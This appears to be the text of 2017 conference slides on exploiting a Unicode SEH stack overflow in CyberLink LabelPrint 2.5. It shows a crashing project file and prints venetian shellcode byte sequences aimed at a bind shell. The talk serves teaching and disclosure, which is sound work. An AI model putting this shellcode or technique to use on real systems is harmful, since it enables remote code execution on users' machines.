cyberlink labelprint 2.5 exploitation process

Exploit

DevelopmentCyberlink LabelPrint 2.5 Unicode Stack Overflow

IT Audit & IT Security Meetup #4 - Sharing in the Cloud

Indonesian Cloud, Jakarta, 13 October 2017

Who?

Thomas Gregory - @modpr0be

IT Security consultant @Spentera

Security researcher (occasionally)

focus on Windows exploitation

IT Security trainer (sometimes)

f3ci - ????

Security researcher

Penetration tester, red team

Appsec & simple exploit dev

What?

CyberLink LabelPrint 2.5

Labeling software

Embedded by default in CyberLink Power2Go

installation.

Included as bloatware in all Lenovo, HP, Asus

laptops somewhere between 2015-2016.

Why?

The exploit development is quite challenging and

interesting

We want to share it for education purposes only.

Let’s BeginTHE FUZZ

Fuzzing possibility

File Input

import

open media

open project

Registry overflow

Tools

Immunity Debugger

with mona plugin

Editor/IDE

/me using sublime text

LabelPrint Project

Project file with extension .lpp

Header

<PROJECT version="1.0.00">

<INFORMATION title="" author="" date="7/24/2017"

SystemTime="24/07/2017">

<TRACK name=“” />

The Bug

In the name parameter, inside the TRACK tag

<PROJECT version="1.0.00">

<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">

<TRACK

name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA








AAAA” />

</INFORMATION>

</PROJECT>

SEH Overwritten

Overwritten SE Handler

Unicode Based

AA or 4141 will be .A.A or 00410041

What is SEH?

a piece of code that is written inside an

application, with the purpose of dealing with the

fact that the application throws an exception

(taken from corelan)

an exception is an event, which occurs during the

execution of a program, that disrupts the normal

flow of the program's instructions.

a catcher, who is trying to catch unusual

behavior.

What is SEH?

This structure ( also called a SEH record) is 8 bytes

and has 2 (4 bytes) elements :

a pointer to the next exception registration

structure (in essence, to the next SEH record, in

case the current handler is unable the handle the

exception)

a pointer, the address of the actual code of the

exception handler. (SE Handler)

Abusing SEH

In other words, the payload must do the following things:

Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won’t kick in.

Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)

Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.

The shellcode should be directly after the overwritten SE Handler. Some small jumpcodecontained in the overwritten “pointer to next SEH record” will jump to it).

Abusing SEH

When the exception occurred, the position on the

stack will going like this:

Possible value to overwrite SE Handler are POP

something, POP something and RETN to the stack.

It will POP address that sit at the top of the stack,

POP it again to take the second address, and RETN

to execute the third address (which is now at the

top of the stack)

The third address usually our supplied input buffer

Top of stack

Our pointer to next SEH

address

Abusing SEH

Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)

Unicode?

Unicode allows us to visually represent and/or

manipulate text in most of the systems across the

world in a consistent manner.

Unicode based exploit usually involved in

file/folder naming

part of input parameter that will deal with naming

More Info

Structured Exception Handler (SEH)

https://msdn.microsoft.com/en-

us/library/windows/desktop/ms680657(v=vs.85).aspx

https://www.corelan.be/index.php/2009/07/25/writi

ng-buffer-overflow-exploits-a-quick-and-basic-

tutorial-part-3-seh/

https://blog.spentera.com/2011/09/14/seh-based-

stack-overflow-the-basic/

Unicode based exploit

https://www.corelan.be/index.php/2009/11/06/expl

oit-writing-tutorial-part-7-unicode-from-0x00410041-

to-calc/

SEH + Unicode = Venetian PROBABLY THE MOST HATED COMBINATION

Venetian Shellcode

One of the registers must point at the beginning ofthe shellcode.

One register must point at a memory location that iswriteable (and where it’s ok to write the newreassembled shellcode)

Normal venetian prepend shellcode

Push another register to stack (ESP)

Pop stack (ESP) into EAX

Align the EAX register with add/sub instruction

Push EAX register into stack (ESP)

RET (return to the beginning of shellcode at EAX)

Sadly, we won’t face a normal venetian approach

Typical Venetian Unicode

Prepend Opcode

Align EAX Register

•If we use EAX as BufferRegister, we need to align EAX to point to our Buffer

“Stack Walking”

•Walk over the Next SEH and SEH.

RET to Shellcode

• Shellcode executed

Typical Venetian Unicode

Prepend Opcodeven = "\x56" #push esi

ven += "\x41" #align

ven += "\x58" #pop eax


ven += "\x05\x04\x01" #add eax,01000400


ven += "\x2d\x01\x01" #add eax,01000100


ven += "\x50" #push eax


ven += "\xc3" #ret

Depends on where

our buffer is.

Use EAX as a

BufferRegister

Problem?

Limited instruction (because of Unicode)

need to find POP POP RET with Unicode friendly

All hex value between 0x80 – 0xFF are marked as bad

Yes, RET opcode (C3) is also included in the bad

character list.

Meanwhile, our venetian shellcode need RET

Typical Venetian

Solution

Find a proper Unicode friendly PPR (pop pop ret)

instructions address somewhere in the library or

executable

Create “our version” of RET

Fill the stack (ESP) with our shellcode

Pointing our RET to CALL ESP instruction address

This will alter the flow of execution.

EAX must be pointing to the beginning of our

shellcode.

“Stack walk” until we meet shellcode.

Our Venetian Unicode

Shellcode

Align EAX Register

Calculate where RET will

be placed

Construct RET in EAX

Calculate EAX for CALL ESP

Opcode

Reaching RET, Execute CALL

ESP

Re-aligning EAX

“Stack walk” to Shellcode

Bind shell 4444

pop pop ret

!mona seh

Fortunately, we found one address that is an

Unicode friendly (0x0044002c) in the main

program (LabelPrint.exe)

Construct RET (1)

Calculate the value of EAX register, preparing the

address where we exactly want the decoded RET

being placed later in the stack.

Limited calculation (because of UNICODE)

Zeroing the EAX register first

xor eax,eax

Construct RET (2)

Preparing address to push our RET:

push esp

pop eax

and EAX register with 01001B00 and EAX register with 01000100

push EAX

pop ESPven += "\x42" #nopven += "\x54" #push espven += "\x42" #nopven += "\x58" #pop eaxven += "\x42" #nopven += "\x05\x1B\x01" #add eax 01001B00ven += "\x42" #nopven += "\x2d\x01\x01" #sub eax 01001000ven += "\x42" #nopven += "\x50" #push eaxven += "\x42" #nopven += "\x5c" #pop esp

Construct RET (3)

After the calculation in EAX, now the stack (ESP) will be

pointing at 0x0012F655 (the same value as EAX)

This is important for our RET decoding address later.

Construct RET (4)

Zeroing Out EAX

We need to clear the EAX register for the next

calculation of the RET opcode.

After EAX is zeroed out we can calculate the EAX

register to meet 0xC300C300 (RET opcode).

We can perform the calculation with AND

operand :

AND EAX register with 7e007e00

AND EAX register with 01000100

Zeroing Out EAX

ven += "\x42" #nopven += "\x25\x7e\x7e" #and eax,7e007e00ven += "\x42" #nopven += "\x25\x01\x01" #and eax,01000100

Construct RET (5)

Preparing RET opcode:

Zeroing Out EAX first (done)

XOR EAX register with 7f007f00

ADD EAX register with 44004400

PUSH EDI

PUSH EAX

The RET Opcode (1)

ven += "\x35\x7f\x7f" #xor eax,7f007f00ven += "\x42" #nopven += "\x05\x44\x44" #add eax,44004400ven += "\x42" #nopven += "\x57" #push edi/paddingven += "\x42" #nopven += "\x50" #push eax

The RET Opcode (2)

Construct CALL to ESP (1)

Stack Walk to Shellcode

Our Venetian Shellcode

ven += "\x58" #pop eaxven += "\x42" #nopven += "\x58" #pop eaxven += "\x42" #nopven += "\x05\x10\x01" #add eax, 11001900, align eax to our bufferven += "\x42" #nopven += "\x2d\x0e\x01" #add eax, 11001800, align eax to our bufferven += "\x42" #nopven += "\x50" #push eaxven += "\x42" #nopven += "\x5C" #pop espven += "\x42" #nopven += "\x58" #pop eaxven += "\x42" #nopven += "\x05\x53\x7c" #add eax 7c005300 part of call espven += "\x42" #nopven += "\x50" #push eaxven += "\x42" * 68 #padding to fill the stackven += "\x7b\x32" #part of call esp

Final Exploithttps://www.exploit-db.com/exploits/42777/

Solution

For now, do not user CyberLink Label Print.

Thank [email protected]

cyberlink labelprint 2.5 exploitation process

Software